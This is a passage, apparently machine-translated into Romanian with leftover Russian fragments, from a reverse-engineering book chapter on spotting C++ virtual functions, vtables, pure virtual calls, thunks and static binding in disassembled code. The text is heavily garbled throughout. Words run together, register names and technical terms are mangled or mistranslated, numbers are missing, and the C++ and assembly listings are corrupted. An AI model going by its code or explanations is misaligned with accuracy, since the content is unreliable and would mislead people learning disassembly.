arată în lista Листинг , Идентификация функции main text: text: text: F text: F text: F text: F text: A text: A •text: AA text: AA text: AA Text: AA Text: AA Text: Ab Push DWORD D PUSH DWORD D CALLL MAIN;A se vedea: Ambeleargumente funcționează - indicatoare pe;Global Variables () Adăugare ESP, OCH MOV [EBP+VAR LC], EAX PUSH EAX;Vezi:Valoarea returnată de funcție este transmisă;Funcțiile de ieșire ca proces de finalizare a procesului;Aceasta înseamnăcă aceasta este funcția de apel principal exit, de asemenea, acordați atenție faptului că rezultatul finalizăriifuncției principale este transmis la următoarea funcție (aceasta este, de regulă, ieșirea funcției bibliotecii) Așa căne -am dat seama de identificarea principalelor tipuri de funcții de pornire Desigur, în viață se întâmplă nu la fel desimplu ca în teorie, dar în orice caz, tehnicile descrise sunt vizibile Vor simplifica analiza Identificarea variabilelor globale va fi descrisă în detaliu în capitolul , „Identificareavariabilelor globale” Capitolul Identificarea funcțiilor virtuale Termenul „funcție virtuală” prin definiție înseamnă„o funcție determinată de execuția programului” Când se numește o funcție virtuală, codul executat trebuie să corespundătipului dinamic al obiectului din care este cauzată funcția Prin urmare, adresa funcției virtuale nu poate fideterminată în stadiul de compilare - aceasta trebuie făcută direct la momentul apelului său De aceea, o funcțievirtuală este întotdeauna o provocare indirectă Excepția de la această regulă este doar funcțiile virtuale aleobiectelor statice, care vor fi descrise mai detaliat în secțiunea „Legătură statică” în acest capitol În timp cefuncțiile nevinovate sunt cauzate în același mod ca funcțiile c obișnuite, apelul funcțiilor virtuale este radicaldiferit O schemă specifică depinde de implementarea unui anumit compilator, dar în cazul general, legăturile către toatefuncțiile virtuale sunt plasate într -un tablou special - un tabel virtual (tabel virtual, VTBL) și în fiecare copie aobiectului folosind cel puțin cel puțin O funcție virtuală, este plasat un indicator pentru o masă virtuală (Pointer detabel virtual, vptr sau vPOinter) Mai mult, indiferent de numărul de funcții virtuale, fiecare obiect are un singurindicator A call of virtual functions always occurs indirectly, through a link to a virtual table - for example: Call[EUH+SOW], where the EUCH is a register containing a displacement of the virtual table in memory, and x is thedisplacement of the Pointer la funcția virtuală din tabelul virtual Analiza apelului funcțiilor virtuale este împinsăîntr -o serie de dificultăți, dintre care cea mai insidioasă este necesitatea de a inversa codul pentru urmărireavalorii registrului utilizat pentru adresarea indirectă Este bine dacă este inițializată prin valoarea imediată, cum arfi MoJ EV, compensă VTBL lângă locul de utilizare Cu toate acestea, mult mai des indicatorul de pe VTBL este transmisfuncțiilor ca un argument implicit sau, chiar mai rău, același indicator este folosit pentru a numi două funcțiivirtuale diferite În acest caz, există incertitudine - ce valoare (valoare) are în această ramură a programului?Vomanaliza exemplul dat în lista Trebuie amintit că, dacă aceeași funcție nevinovată este prezentă atât în ​​clasa debază, cât și în derivatul clasei, atunci funcția de bază a clasei este întotdeauna numită Listarea Demonstrareaapelului funcțiilor virtuale #include Clasa Base {public: Virtual void Demo (void) Capitolul Identificareafuncțiilor virtuale printf ("Baza \ n");Virtual void DEMO (void) {printf ("Demo de bază \ n");};Void DEMO (void) {printf ("Demo de bază non virtual \ n");Class derved: public base {public: virtual void demo (void) {printf("derved \ n");Virtual void DEMO (void) {printf ("Demo derved \ n");Void DEMO (void) {printf ("Demo derved nonvirtual \ n");Main () {base *p = baze noi;P-> demo ();p-> DEMO ();P-> DEMO ();P = new Derved;P-> demo ();p->DEMO ();P-> DEMO ();} Rezultatul compilării exemplului prezentat în lista , în cazul general, ar trebui săprivească așa cum se arată în lista „J Listarea Rezultate JL^ Compilarea unui exemplu prezentat de o listă principală proc Cod xref: start+af^p pushh eSi push apel? @yapaxi@z;Operator nou (UINT);EAX C este un indicatorpentru o unitate de memorie selectată;Subliniem patru octeți de memorie pentru o copie a unui nou obiect ;Obiectulconstă dintr -un pointer la VTBL Adăugați test z esp, EAX, EAX scurt LOC Eroare de selecție a memoriei Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat;Verificarea succesului memoriei este mov dwordptr [eah], offseet base vtbl;Aici, în copia doar creată a obiectului este copiată;Pointerul la tabelul virtual al claseide bază ;Faptul că acesta este tocmai tabelul virtual al clasei de bază poate fi recunoscut;După analizarea elementeloracestui tabel - acestea indică membrii;Prin urmare, clasa de bază, tabelul în sine este un tabel virtual;Clasa debază Mov Esi, eah;ESI = ** base vtbl;Intrăm un index la o instanță a obiectului în ESI (indicator la; pointer tobase vtbl) ;Pentru ce?Cert este că, de fapt, indicatorul este introdus în ESI;o copie a obiectului , dar în aceastăetapă toate aceste detalii sunt în această etapă;Nimic, prin urmare, spunem pur și simplu că în ESI există unindicator;Pointer la tabelul virtual al clasei de bază ,;Fără a -și aprofunda, de ce a fost nevoie de acest dubluindicator, JMP scurt S V OS :;Cod xref: sub +dîj Xor ESI, ESI;Resetați forțat indicatorul la oinstanță a obiectului (această ramură primește; control numai în cazul alocării de memorie nereușită pentru;obiect) Zero Pointer Orbirea unui manipulator structural;excepții La prima încercare de a face apel, suntem forțați;indicator la o instanță aobiectului OS V : Cod xref: sub + ój mov eax, [ESI];Eax - *base vtbl == *base demo;Intrăm un indicatorla tabelul virtual EAX al clasei de bază;Nu uitați că indicatorul către tabelul virtual;În același timp, este unindicator la primul element al acestui lucru;Mese Și primul element al tabelului virtual care conține;indicatorul laprima funcție virtuală (în ordinea anunțului);clasă Mov Esh, ESI;Esh = this;Aducem un pointer la ECH la o instanță aobiectului, transmisând;Funcția cauzată este un argument implicit - indicatorul acestui Call DWORD PTR [EAX];Apelațibase demo;Iată OH - un apel al funcției virtuale pentru a înțelege ce anume;Funcția este cauzată, trebuie să știmvaloarea registrului EAX ;Defilând ecranul dizassemblerului, vedem - puncte EAH;pe base vtbl și primul membru albase vtbl (vezi mai departe) indică;Funcția base demo Prin urmare: ;a) Acest cod determină funcția funcției base demo va fi descrisă mai detaliat în capitolul , „Identificarea obiectelor, structurile imaginilor” Mai detaliat, acestlucru va fi descris în capitolul , „Identificarea acestui lucru” și în capitolul , „Identificarea argumentelorfuncțiilor” GPAVA Identificarea funcțiilor virtuale ;b) funcția base demoeste funcția virtuală mov edx, [eSI];Edx = *base demo;Intrăm indicatorul la primul element al tabelului virtual alclasei din EDX;Vază Mov Esh, ESI;Esh = this;Intrăm un index la o instanță a obiectului din ES;Acesta este un argumentimplicit al funcției - indicatorul This Call DWORD PTR [EDX+ ];Apel [base vtbl+ ] (base demo );O altă provocare afuncției virtuale „de a înțelege ce anume;Funcția se numește, trebuie să cunoaștem conținutul registruluiEDX ;Parcurgând ecranul Dizassemblerului, vedem că este;Indică baza vtbl, iar edx+ , prin urmare, indică aldoilea;Elementul tabelului virtual al clasei de bază El, la rândul său, este;Indică funcția base demo Push ofsetanonvirtualbase;„Demo de bază non virtual \ n” Call Printf;Dar apelul nu este o funcție virtuală Atenție - el;Apare caun apel al funcției c obișnuite (Acordați atenție că această funcție este construită -in, deoarece este declarată directîn; clasa în sine și, în loc să o numească, înlocuirea este efectuată; cod) împinge apel? @yapaxi@z;Operator nou(UINT);Următorul este apelul funcțiilor clasei derged Nu vom fi aici în detaliu;Comentează -l - fă -o singur Îngeneral,;Clasa derged era necesară doar pentru a arăta;Caracteristicile aspectului tabelelor virtuale adaugă esp, ;Curățare după printf și test nou EAH, EAH □ Z scurt OS A;Mov dword ptr [eah], offset derved - vtbl mov esi,eax;ESI == ** derved vtbl JMP scurt LOC C LOOC A: XOR ESI, ESI IOS - C: MOV EAX, [ESI] MOV ECX, ESICALLL DWORD PTR [EAX] MOV EDX, [ESIS] MOV EDX, ESIC, [ESIS] MOV Edx, eSIT + ];Cod xref: sub + eîj;Cod xref:sub + viteză;Eax = *derved vtbl;Ecx = this;Apel [derved-vtbl] (demo-demo);Edx = *derved vtbl;Ecx = thls;Apelul[derved - VTBL+ ] (derved - Deemo ) va fi descris mai detaliat în capitolul , „Identificarea acestui lucru” PARTEA III Identificarea structurilor cheie ale limbilor de nivel înalt împinge anonvirtualbase de apel printf;Atenție -cauzată;Nu este o clasă derivată !!!add esp, pop esi retn main endp BASE DEMO proc near push offset aBase call printfpop ecx retn BASE DEMO endp BASE DEM proc near push offset aBaseDemo call printf pop ecx retn BASE DEM endpDERIVED DEMO proc near push offset aDerived call printf pop ecx retn DERIVED DEMO endp DERIVED DEM proc Aproape PushOffset AdeRedeMO Call Printf pop ecx retn derined dem endp;"Demo de bază non virtual \ n* funcție base demo abazei ,; date xref: rdata: v o;" base \ n "; data xref: v i;" demo de bază \ n "; data xref: rata: Rdata: rdata: Rdata: Rdata: Sub + îo date xref: sub +fîo; обратите внимание - ви Ordineadeclarației funcțiilor virtuale în clasă virtual;Funcțiile sunt situate unul lângă celălalt în ordinea anunțului lor Implementarea apelurilor cu funcții virtualeeste prezentată în Fig GPAVA Identificarea funcțiilor virtuale Fig Implementarea funcțiilor virtualecare identifică o funcție virtuală pură dacă funcția este declarată în clasa de bază și este realizată în derivat - oastfel de funcție se numește funcție pur virtuală și o clasă care conține cel puțin o astfel de funcție se numește oclasă abstractă Limba C ++ interzice crearea de copii ale clasei abstracte și cum pot fi create dacă, cel puțin, unadintre funcțiile clasei nu este definită?La prima vedere - nu este definit și bine - care este problema?La urma urmei,acest lucru nu afectează analiza programului De fapt, acest lucru nu este așa - o funcție pur virtuală în tabelulvirtual este înlocuită cu un pointer la funcția de bibliotecă purecall De ce este nevoie?Cert este că, în stadiulcompilării programului, este imposibil să „prindem” toate încercările de a apela funcții pur virtuale, dar dacă apare unastfel de apel, managementul va primi un pre -substituit Manpurecau aici, care va afișa un mesaj de eroare Acest lucruinformează despre interdicția provocării funcțiilor pur virtuale și completează aplicarea aplicației Puteți citi maimulte despre acest lucru în nota tehnică MSDN Q , din iunie Astfel, după ce ne -am întâlnit în tabelulvirtual, semnul n purecall, putem spune cu încredere că avem de -a face cu o funcție pur virtuală Luați în considerareun exemplu dat în lista #include base de clasă {public: demo void virtual (void) = ;Clasa derved: PublicBase { Partea III Identificarea structurilor cheie ale limbilor de nivel înalt public: Demo void virtual (void){printf ("dervedxn");Bază *p = new derved;P-> demo ();} Rezultatul compilării acestui exemplu în cazul general ar trebuisă privească așa cum se arată în lista = Listarea Rezultatul exemplului de exemplu dat în lista -principalul proc din apropiere;Cod xref: start+af, lp push apel? @yapaxi@z add esp, ;Alocarea memoriei pentru o nouăinstanță a testului obiect EAH, EAH;Verificarea succesului izolatului memoriei JZ scurt S Mov EU, EAH;Esh =acest apel GetDeRined vtbl;introducerea obiectului indicator în tabelul virtual al clasei într -o copie;Derved JMP scurtLOC LOC : Cod xref: main+cîj xor eax, eax;EAX = NULL LOC : Cod xref: main+ îj mov edx,[eax];Aici, există o excepție de la apelul la Zero Pointer Mov UE, EAH JMP DWORD PTR [EDX] Endp principal Getderved vtblProc Near C DE XREF: Main+Lop Push ESI MOV ESI, ECX;Un argument implicit este transmis prin registrul ECX - acest apelsetPointtopure;Funcția introduce un pointer în pureCall într -o instanță a obiectului;o funcție specială - un dop încazul unui apel neplanificat;Funcție pur virtuală mov dword ptr [ESI], offset derved vtbl;Introducerea obiectuluiindicator în tabelul virtual al GPAV Identificarea funcțiilor virtuale ;Clasa derivată, cu ștergerea valoriianterioare;(Pointer to pureCall) Mov eax, ESI Pop ESI Retn Getderbed vtbl endp derved demo proc apropiat;Date xref: rdata: a i push ofset adversed;„Derved \ n” Call Printf pop ecx retn derved demo endp setpointtopure proc Codxref: getdederined vtbl+ ip mov eax, ecx mov dword ptr [eax], offset purefunc;Intrăm conform [EAX] (într -o copie anoului obiect) un indicator către un special;Funcție - pureCall, care este conceput pentru a urmăriîncercările;apelarea unei funcții pur virtuale în timpul implementării programului -;Dacă apare o astfel de încercare, pureCall va afișa un mesaj despre ecran;Inadmisibilitatea de a apela o funcție pur virtuală nu poate fi finalizată șiva finaliza funcționarea Retn setPointtopure Endp derved vtbl DD offset derved demo;Date xref: getdederined vtbl+ viteze purefunc dd birou purecall;Date xref: setPointtopure+ viteză;Pointerul funcției Dumplush pureCall Prinurmare, avem de -a face;Cu funcție pur virtuală Utilizarea comună a tabelului virtual cu mai multe copii ale obiectului,indiferent de câte copii ale obiectului există - toate folosesc același tabel virtual (Fig ) Tabelul virtualaparține obiectului în sine, dar nu și o copie (copii) a acestui obiect Cu toate acestea, există excepții din aceastăregulă, care vor fi descrise în secțiune „Copii ale tabelelor virtuale” în acest capitol Orez Toate copiileobiectului folosesc același tabel virtual Partea III Identificarea structurilor cheie ale limbilor de nivel ridicatpentru a confirma ceea ce s -a spus că ia în considerare exemplul dat în lista Listarea , demonstrație vi "la ^^ ospolizarea unui tabel de copiere mai multe copii ale clasei #include Baza clasei (Public:Virtual Demo () (printf ("Baza \ n")));Class derved: public base {public: virtual Demo () {printf ("Denved \ n");Main ()(bază * ob^l = new derved; base * ob] = new derved; obj -> demo (); obj -> demo (); rezultatul acestui exemplu artrebui să arate așa cum se arată în lista Main Main Proc Near C DE XREF: START+AFJ P PUSH ESI PUSH EDI PUSH CALL? @yapaxi@z; operator nou (uint) Adăugare esp, ; evidențiază memoria pentru prima instanță a obiectului test EAX,EAC Z Z short ос В mov ecx, еах ; ЕАХ — указывает на первый экземпляр объекта call GetDERIVED VTBL ; в ЕАХ —указатель на виртуальную таблицу класса DERIVED mov edi, еах ; EDI = *DERIVED VTBL jmp short loc Dloc B: ; CODE XREF: main+EÎj Гпава Идентификация виртуальных функций xor edi, edi loc D: C DE XREF: main+ Îj push call ?? @YAPAXI@Z ; operator new(uint) add esp, ;выделяем память под второй экземпляр объекта test еах, еах JZ scurt ос Mov Esh, eah; esh - acest apelGetderiveD vtbl;Atenție - a doua copie folosește aceeași;Tabel virtual derved vtbl dd offset derved demo DATA XREF:GetDeRined VTBL+ îo Base VTBL DD OFFESET BASE DEMO Date xref: getbase vtbl+ îo;Atenție-tabelul virtual este unul pentrutoate copiile clasei de tabele virtuale „OK, pentru o muncă de succes, este de înțeles, este suficient pentru o masăvirtuală, dar în practică trebuie să te confrunți cu faptul că fișierul studiat este înfiorător cu copii ale acestortabele virtuale Ce fel de atac este acesta, de unde provine și cum să te descurci?Dacă programul este format din maimulte fișiere compilate în module de obșuri independente (iar această abordare este utilizată în aproape toateproiectele mai mult sau mai puțin serioase), compilatorul, evident, ar trebui să-și plaseze propria tabel virtual înfiecare fișier obj pentru fiecare clasă Folosit de modulul de clasă De fapt - Cum știe compilatorul despre existențaaltor module de obiect și prezența tabelelor virtuale în ele?Așa nu este nevoie de nimeni, care părăsește memoria șiîngreunează analizarea Adevărat, în stadiul aspectului, linkerul poate detecta copii și le poate elimina, iarcompilatorii înșiși folosesc diverse tehnici euristice pentru a crește eficiența codului generat Următorul algoritm acâștigat cel mai popular: tabelul virtual este plasat în modulul care conține implementarea primei funcții nevinovatenesănătoase a clasei De obicei, fiecare clasă este implementată într -un singur modul și, în cele mai multe cazuri, oastfel de euristică funcționează Mai rău dacă clasa constă din funcții virtuale sau construite - în acest caz,compilatorul începe să plaseze tabele virtuale în toate modulele în care este utilizată această clasă Ultima speranță deînlăturare a copiilor „gunoiului” se află pe compoter, dar nu este un panaceu De fapt, aceste probleme ar trebui să aibămai multă grijă de dezvoltatorii programului (dacă sunt îngrijorați de numărul de programe de memorie) Pentru analiză,copii suplimentare sunt doar un obstacol enervant, dar în niciun caz un obstacol irezistibil!O listă coerentă înmajoritatea cazurilor este un tabel virtual, un tablou comun, dar unele compilatoare o reprezintă sub forma unei listecoerente În acest caz, fiecare element al tabelului virtual conține un pointer la următorul element, iar elementele însine sunt plasate nu sunt apropiate unele de altele, ci împrăștiate în întregul fișier executabil În practică, acestaeste modul în care este extrem de rar, așa că nu ne vom baza pe acest lucru în detaliu Este suficient să știți că acestlucru se întâmplă Dacă îndepliniți listele (care, totuși, este puțin probabil) - descoperiți circumstanțele, deoareceacest lucru nu este dificil Partea a III -a Identificarea structurilor cheie ale limbilor de nivel înalt prinintermediul gateway -ului sunt pregătite să găsească indicatorul la funcția virtuală din tabelul virtual, dar la codulcare modifică acest indicator, aducând deplasarea funcției cauzate în ea Această tehnică a fost propusă pentru primadată de dezvoltatorul limbajului însuși-o frânghie ostust bjann, care a împrumutat-o ​​din implementările timpurii alelimbii Algol În Algol, codul care corectează indexul funcției cauzate se numește Gateway (Thug ), iar provocarea însine este o provocare prin poartă Este destul de corect să folosiți această terminologie în raport cu C ++ Cu toateacestea, în prezent, apelul prin gateway este extrem de mic și nu este utilizat de aproape niciun compilator În ciudafaptului că oferă stocare mai compactă a tabelelor virtuale, modificarea indicatorului duce la costuri aeriene excesive Procesoare cu arhitectură transportoare (și Pentium - cel mai frecvent procesor - doar construit într -o astfel dearhitectură) Prin urmare, utilizarea apelurilor de gateway este justificată doar în programele critice pentrudimensiuni, dar nu pentru a accelera Puteți citi mai multe despre toate acestea în Cartea Bjern Straustup „Design șievoluție a C ++” Un exemplu dificil, atunci când funcțiile non -reverse se încadrează în tabele virtuale până acum, amluat în considerare doar cele mai simple exemple de utilizare a funcțiilor virtuale În viață, uneori acest lucru segăsește Consideră un caz dificil de moștenire cu un conflict de nume (listarea ) Listarea Un exemplu careilustrează plasarea funcțiilor non -loanale în virtual: tabele cu un conflict de nume - #include clasa A(public: virtual void f () {printf ("a f \ n");};) ;Clasa B {public: Virtual void f () {printf ("b f \ n");};virtualvoid g () (printf ("b g \ n");};);Clasa C: public A, public în {public: void f () {printf ("c f \ n");} a *a = new a;În*b = new b;C *c = nou c;Bjern Strautrup „Proiectarea și evoluția limbajului C ++” -SPB DMK-Press Peter, GPAVA Identificarea funcțiilor virtuale Cum va arăta tabelul virtual al clasei C?Deci, să ne gândim: întrucât clasa Ceste un derivat al claselor A și B, atunci moștenește funcțiile ambelor clase, dar funcția virtuală f () din clasa B sesuprapune aceeași funcție virtuală a clasei A și, prin urmare Nu este moștenit de la clasa A Mai mult, întrucât funcțianon -voială f () este prezentă și în derivatul clasei C, acesta blochează funcția virtuală a clasei derivate (da, exactașa, dar funcția care nu se suprapune nu se suprapune pe un alt non -plâns Funcție și este întotdeauna numită din clasade bază de bază, mai degrabă decât de la o clasă derivată) Astfel, tabelul virtual din clasa C ar trebui să conțină unsingur element-un pointer la funcția virtuală g () moștenită de la B, iar funcția non-inversă f () este cauzată ca ofuncție c convențională Dreapta?Nu!Acesta este tocmai cazul în care o funcție nevinovată este numită prin pointer - cafuncție virtuală Mai mult, tabelul clasei va conține nu două, ci trei elemente!Al treilea element este o legătură cufuncția virtuală f () moștenită de la B, dar înlocuită imediat de compilator la „adaptor” la c :: f () UF cât dedificil este totul!Pentru a clarifica situația, luăm în considerare listarea DizAssembleed a acestui exemplu (lista ) Listarea Cod dezasamblat de la listarea Adăugarea apelului principal push împinsă apăsare;Subliniemmemoria pentru o instanță a obiectului A Test EAH, EAH JZ scurt S C MOV, EAH;Esh = acest apel get a vtbl;A [ ]=*a vtbl;Punem un indicator pe tabelul său virtual Mov Ebx, EAX într -o instanță a obiectului;EBX = *A JMP scurt OS E LOC C : C DE XREF: Main+Föj Xor EBX, EBX LOC E: C de xref: main+laîj push apel? @yapaxi@z;Operator nou (UINT) Adăugare ESP, ;Subliniem memoria pentru un obiect al unui obiect din Test EAH, EAH JZscurt S MOV, EAH;Esh = acest apel get b vtbl;b [ ] = *b vtbl;Punem un indicator pe tabelul său virtual MovESI, EAX într -o instanță a obiectului;ESI = *B JMP scurt LOC LOC : Cod xref: main+ aîj Xor ESI,ESI;Cod xref: start+afj-p proc lângă EBX ESI edi ?? @yapaxi@z;Operator nou (UINT) LOC :;Cod Xref: Main+ îj Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat împinge apel? @yapaxi@z;Operator nou(UINT) Adăugare ESP, ;Subliniem memoria pentru un obiect al unui obiect din Test EAH, EAH JZ scurt S MOV ECX,EAH;Esh = acest apel get c vtbls;Ret: eax =*c;Punem un indicator pe tabelul său virtual într -o instanță aobiectului; Edi = *C LOC : Xor edi, edi loc : mov eax, [ebx] mov ecx, ebx call dword ptr [eax] mov edx,[esi] mov ecx, esi call dword ptr [edx] mov esi, [esi] Mov Ecx, ESI Call DWORD PTR [EAX+ ] MOV EDX, [EDI] MOV ECX, EDICALL DWORD PTR [EDX];Cod xref: main+ viteză;Cod xref: principal+ viteză;Eax = a [ ] = *a vtbl;Ecx = *a;Apel [a vtbl](a f);Edx = b [ ];Ecx = *b;Apel [b vtbl] (b f);Eax = b [ ] = b vtbl;Ecx = *b;Apelați [b vtbl+ ] (b g);Edx = c [ ] =c vtbl;Ecx = *C;Apel [c vtbl] (c f);Atenţie!Apelarea unei funcții nevinovate are loc ca virtual!ROR EDI ROR ESI ROR EBXRETN ENDP principal Get c vtbls proc din apropiere;Cod xref: main+ îp push eSI;ESI = *B pushh edi;Ecx = *c Mov ESI, Ecx;ESI = *C CALLGET A VTBL;C [ ] =*a vtbl;Plasim într -o copie a obiectului cu un pointer la un virtual;Clasa A Table Lea Edi,[ESI+ ];Edi = *c [ ] mov ecx, edi;Ecx = " C F CALL GET B VTBL;C [ ] =*b vtbl;Adăugați la o instanță a obiectului cu unindicator la un tabel virtual;Clasa B, adică, acum obiectul C conține două semne pentru două;Tabele virtuale aleclaselor de bază Să vedem mai departe ca un compilator;Faceți față conflictului numelor MOV DWORD PTR [EDI], offsetC VTBL FORM B;C [ ] =* c vtbl;Da!Pointerul la tabelul virtual al clasei B este înlocuit cu indicatorul GPAV Identificarea funcțiilor virtuale ;În tabelul virtual al clasei C (vezicomentariile din tabelul în sine) Mov DWORD PTR [ESI], Offset C VTBL;C [ ] = c vtbl;Da, încă o dată - acum un indicatorla tabelul virtual al clasei A;înlocuit de un indicator la tabelul virtual al clasei C care;cod non -optim, deoareceacest lucru ar putea fi redus la stadiu;Compilare!Mov eax, ESI;Eax = *c pop edi pop esi retn get c vtbls endp get a vtblproc apropiat;C de xref: main+ îp get c vtbls+ viteză mov eAx, ecx mov dword ptr [eax], offset a vtbl;Punem unindicator pe clasa virtuală în retn get a vtbl endp a-f proc din apropiere;Date xref: rdata: a îo;Funcțievirtuală f () clasa A Offset AA F;"A f \ n" apel printf pop ecx remen a f endp get b vtbl proc aproape C DE XREF:Main+ ope Get C VTBLS+Eîp MOV EAX, ECX MOV DWORD PTR [EAX], OFFSET B VTBL;Punem un indicator pe clasa virtuală în retnget b vtbl endp b f proc din apropiere;Date xref: rdata: acîo;Funcția virtuală f () de clasă în Push OffsetAB F;"B f \ n" apel printf pop ecx retn b f endp b g proc aproape;Date xref: rdata: b b îo;Funcția virtuală g ()de clasă în Push Offset AB G;"B g \ n" apel printf pop ecx retn b g endp c f proc aproape;Cod XREF: C F+ Speed ​​ Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat;Funcția non -reversă f () din clasa C arată șieste numită ca un birou virtual ac f;"C f \ n" apel printf pop ecx retn c f endp -c f proc din apropiere;Date xref: rdata: b îo sub ecx, jmp c f;Vedeți ce funcție ciudată este primul, niciodată;Se numește și, în al doilea rând,acesta este un adaptor la funcția C F ;De ce scade echul?În Ech, compilatorul a plasat pokerul acest lucru;care, înaintede o scădere, a încercat să indice funcția virtuală f () ,;Moștenit de la clasa V , dar, de fapt, acest lucru a indicatacest lucru;adaptor Și după o scădere, a început să indice elementul anterior;tabel virtual - adică;Poartă funcția jmp f() clasa C, a cărei apel și C F ENTP A VTBL DD OFFSET A F;Date xref: get a vtbl+ viteză;Tabelul virtual al clasei AB VTBL DD offset B F;Date xref: get b vtbl+ viteză dd offseet b g;Tabelul virtual de clasa B - conține indicatoripentru doi virtuali;Funcții C VTBL DD OFFSET C F Date xref: get c vtbls+ viteză;Tabelul virtual din clasa C conține unindicator pe;Function nevirtual f () c vtbl form b dd offseet c f;Date xref: get c vtbls+ viteză dd offseetb g;Tabelul virtual de clasa C, copiat de un compilator din clasa B;Inițial, a constat în două semne pe funcțiile f ()și g (), dar chiar și pe;Etapele de compilare ale compilatorului au descoperit conflictul de nume șiînlocuite;Indicatorul indicatorului B :: F () la adaptorul la c :: f () Astfel, de fapt, tabelul virtual al claseiderivate include tabele virtuale ale tuturor claselor de bază (în orice caz, toate în care moștenește funcții virtuale)În acest caz, tabelul virtual din clasa C conține un pointer pentru funcția non -revituală a clasei C și a tabeluluivirtual al clasei B Sarcina este cum să determinați că funcția cu :: f () nu este virtuală?Și cum să găsești toateclasele de bază din clasa C?Să începem cu acesta din urmă - da, tabelul virtual de clasa C nu conține niciun indiciu alrelațiilor sale de familie cu clasa A, ci priviți conținutul funcției get c vtbls, - vezi: se încearcă să fie încorporatîn indicator pentru Prin urmare, tabelul virtual A, clasa C, este derivată din a Puteți obiecta la acest lucru care spunei, acesta nu este un mod prea fiabil, compilatorul ar putea optimiza codul aruncând un apel la Clasa A tabel virtual, care încă nu este necesar Acest lucru este adevărat - ar fi un Mong, dar, în practică,majoritatea compilatorilor nu fac asta și, dacă o fac, tot lasă suficiente informații în exces care vă permit săinstalați clase de bază O altă întrebare este dacă este necesar să se instaleze „părinții” din care nu este moștenită osingură funcție?(Dacă cel puțin o funcție este moștenită, nu apar dificultăți în căutare ) În general, pentru analiză,aceasta este într-adevăr non-nexia Identificarea funcțiilor virtuale este , dar cu atât este mai exact codulinițial al programului Fii restaurat, cu atât va fi mai clar și cu atât va fi mai clar, va fi mai ușor să -ți daiseama Acum să trecem la funcția non -nirtual f () Să ne gândim la ce s -ar întâmpla dacă ar fi de fapt virtual?Apoi, eava bloca funcția cu același nume al claselor de bază și nu s -ar fi îndeplinit nicio „sălbăticie”, cum ar fi „adaptoare”din programul compilat Și din moment ce se întâlnesc, înseamnă că nu totul este neted aici, iar funcția nu estevirtuală, deși se străduiește să pară așa Din nou, teoretic, compilatorul „inteligent” poate arunca un adaptor și unelement duplicat al tabelului virtual din clasa C, dar în practică această intelectualitate nu este observată Legarea statică este o diferență cum să creezi un obiect al obiectului-Myclass Zzz;Sau myclass *zzz = newMyClass?Desigur, există o diferență În primul caz, compilatorul poate determina adresele funcțiilor virtuale chiar și înstadiul de compilare, în timp ce în a doua - aceste adrese trebuie calculate în timpul programului O altă diferență:obiectele statice sunt implementate în stivă (segmentul de date) și dinamic - într -o grămadă Tabelul funcțiilorvirtuale este încăpățânat creat de compilatoare în ambele cazuri, iar atunci când fiecare funcție este numită (inclusivnon -revirtual), este pregătit indicatorul astfel care conține adresa obiectului obiectului Astfel, dacă găsim ofuncție cauzată direct de deplasarea sa, dar în același timp prezentă în tabelul virtual al clasei - putem spune cuîncredere că aceasta este funcția virtuală a copiei statice a obiectului Luați în considerare un exemplu care ilustreazăprovocarea funcției virtuale statice (lista ) - -;- - Listarea Demonstrația unui apel, funcția virtuală statică '#include base de clasă{public: virtual void demo (void) ("demo de bază \ n");}; \ n ");}; void DEMO (void) printf (" Demo de bază nonvirtual \ n "); clasa derved: public: Demo Virtual Viodal (void), de regulă, acest indicator este plasat într -unul degeneral -Registre de scop Acest lucru va fi descris mai detaliat în capitolul , „Identificarea argumentelorfuncțiilor” Partea a III -a Identificarea structurilor cheie ale limbilor de nivel înalt ("Demo \ n");} ; ();p demo (); p demo (); derivat d; d demo (); d demo (); d demo (); резульат ком formă , как показано в листинron udистинг , результат примера, principala proc ned în listareURECHE;Cod xref: start+af^p var = byte ptr- ;derved var = byte ptr - ;Baza;Adesea, (dar nu întotdeauna!) Corpul de obiecte din stivă se află mai jos;sus, adică,în ordinea inversă a anunțurilor lor în programul Push EBP MOV EBP, ESP Sub Esp, Lea Ecx, [EBP+VAR ];Apel de bazăGetBase VTBL;P [ ] =*base vtbl;Acordați atenție - copia obiectului este plasată în stivă;Și nu într -o grămadă!Desigur,acest lucru indică și un static;Natura unei copii a obiectului (obiecte dinamice pot fi, de asemenea, plasate în;stivuie), dar un indiciu de „statică” este încă deservit de Lea Esh, [EBP+VAR ];Baza;Pregătim polul acestui lucru (încazul în care are nevoie; funcții) Apelați base demo;Apelarea directă a funcției!Aici, însoțit de prezența sa încapitolul virtual Identificarea funcțiilor virtuale ;Certificat de tabel de staticitate a admiteriiobiectului!LEA ECX, [EBP+VAR ];Baza;Pregătim din nou acest indicator la copia apei de bază base demo ;Provocareadirectă a funcției Este într -o masă virtuală?Există!;Deci, aceasta este o funcție virtuală, iar copia obiectului estedeclarată;Static Lea Ecx, [EBP+VAR ];Baza;Pregătim acest indicator pentru funcția non -reversă DEMO CALLBASE DEMO ;Această funcție nu se află în tabelul virtual (vezi tabelul virtual) ,;Deci, nu este virtual LEA ECX,[EBP+VAR ],- Apel Derved GetDeRined VTBL;D [ ] =*derved vtbl Lea Ecx, [ebp+var ];Apel demers Derved demo;În mod similar cu anterior Lea Ecx, [EBP+VAR ];Apel derved derved demo ;În mod similar cu anterior Lea Ecx, [EBP+VAR ];Apel derved base demo ;Atenţie!Indicatorul acest lucru indică;Funcția obiectului se numește !!!Peobiectul derved, în timp ce înseamnă, funcția de bază este derivatul mișcării ESP, ebp pop ebp retn principal endpbase demo proc apropiat;Demo Class Base Push Offset Abase Call Printf Pop Ecx Retn Base DEMO Endp Base DEMO PROCAPRIN;DEMO CLASE BASE PUSE OFFSET ABASEDEMO CALL IMPRIMF POP ECX RETN BASE DEMO ENDP BASE DEMO PROC APRIN;Codxref: main+llîp;"Bază \ n";Cod xref: main+ îp;"Demo de bază \ n";Cod Xref: Main+ Speed ​​ ParteaIII Identificarea structurilor cheie ale limbilor de nivel ridicat;DEMO CLASE BASE PUSE CALL POP BASE DEMO OFFSETANONVIRTUALBASE printf ecx retn endp;„Demo de bază non virtuală \ n” derved demo proc din apropiere;Cod xref:principal+ ope;Clasa demo demoded Push Offset ADERVED;"Derved \ n" Call Printf pop retn ecx derved demo endpderved demo proc apropiat;Cod xref: main+ viteză;Demo Clasa Derved Push Offset ADERINDDDEMO ;"Demo derved \ n"Call Pxintf pop retn ecx derved demo endp base demo proc apropiat;Cod xref: 